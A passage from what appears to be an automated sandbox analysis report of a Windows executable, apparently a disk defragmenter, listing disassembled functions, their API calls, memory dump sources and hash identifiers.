                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                                • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                                • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                                • Opcode ID: b00c1959a732abe81b38a04023ca8e72d7a63f1345359439d75abd74fc18455c
                                                                                                                                                                                                                                                                                                • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b00c1959a732abe81b38a04023ca8e72d7a63f1345359439d75abd74fc18455c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                                Function 00424430 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32 ref: 00429964
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00424612
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 0042452F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekSendWait$DispatchForegroundPostTranslateWindow
                                                                                                                                                                                                                                                                                                • String ID: "RightMenuDisk"$"RightMenuFile"$-AutoDefragmention$-BootTimeDefrag$ScheduleStart
                                                                                                                                                                                                                                                                                                • API String ID: 784092869-278688185
                                                                                                                                                                                                                                                                                                • Opcode ID: ae75744f42937a93e4d978927d4a407ffc77d4ecce76bde2d063ee0ff42c9edc
                                                                                                                                                                                                                                                                                                • Instruction ID: c97898347ab5420be132615685895ca4f66fbeb7c47801a8b84119e28bf46611
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae75744f42937a93e4d978927d4a407ffc77d4ecce76bde2d063ee0ff42c9edc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251C431304310AFC300EF15EDC5A6BB7E4EBD8755F84092EF54A92291DBB89988CB5A
                                                                                                                                                                                                                                                                                                Function 00465A50 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 157windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00465A5F
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00465A78
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00465B27
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00465B49
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00465B61
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00465BA5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$ClientMessageParentReleaseSendWindow
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 330964712-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                                • Instruction ID: b1a5f572caf67006923a9ef52c219ce68de25ddbd2c2a7f7615237fc757273c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0510371600B019FD324DF79C889BA7B3E9BF88704F008A1DE5AA97281DB74B854CF59
                                                                                                                                                                                                                                                                                                Function 0042F8E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042F900
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042F916
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 0042FA08
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3401074$3401075$3401076$3401077
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1879149864
                                                                                                                                                                                                                                                                                                • Opcode ID: c4bce1112986585be18b77c07089e63f6cda37178a12ed3d6a88cb22f3d1e080
                                                                                                                                                                                                                                                                                                • Instruction ID: b1405050125067dfa2b98fefbbf4893992a49d55c405f1a2d248d2381da72ad7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4bce1112986585be18b77c07089e63f6cda37178a12ed3d6a88cb22f3d1e080
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D3168F07903007BE674EB258D83FEA72A59B44B54F20892FB71E762D1CAF87844965C
                                                                                                                                                                                                                                                                                                Function 004549E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 96fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 00454A46
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000), ref: 00454ABC
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090064,00000000,00000000,00000340,00000060,00000003,00000000), ref: 00454AE8
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00454AFA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandleInformationVolume
                                                                                                                                                                                                                                                                                                • String ID: C:\$NTFS$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1233574911-974996950
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a7ffa21548745985fbbbea45252e330d1802da0f0ea7318edadfa9cc625902c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b712c942aafd56dc5bdacd96f40fd37a890dc6406218b81da3fa3882dbb5d1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE311D71608300AFE320CF64D885B6BB7F8AF88714F400A2DF549D7291E7B5E584CB5A
                                                                                                                                                                                                                                                                                                Function 0042D380 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,?,00000000), ref: 0042D3DB
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D3F8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D411
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042D433
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042D46C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: Selected$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3404155819
                                                                                                                                                                                                                                                                                                • Opcode ID: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction ID: 47af735872212f4aff9019aaa9f39296bd56d2d945b6e3696df55891068cb05b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 277d209018b5d9a8a410fc2a0ed1bbfc6736054aef52b9b75753d9dc20516a73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521D8757407117BE230EB79ED82F9BA3A4AB48B55F504A1AF705A72C1CAB4F801879C
                                                                                                                                                                                                                                                                                                Function 00420AA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 00420AB8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00000005,00000000), ref: 00420ACA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001207,00000006,?), ref: 00420AE9
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00420AFB
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000005), ref: 00420B28
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00420B37
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$ClientRect
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 1925248871-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                                • Instruction ID: f6960d58b42149bb48d8704757dd9bea0314272504ba79e98d6d7c5fe9983159
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC115E717403057BE235EA79CC86FA773E9AB88B40F41491CF285EB1C1DAB9F9448B54
                                                                                                                                                                                                                                                                                                Function 00453220 Relevance: 12.3, APIs: 8, Instructions: 266memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00453297
                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00453332
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004533BF
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004533E6
                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004534A6
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004534B7
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004534BE
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004534C5
                                                                                                                                                                                                                                                                                                Memory Dump Source
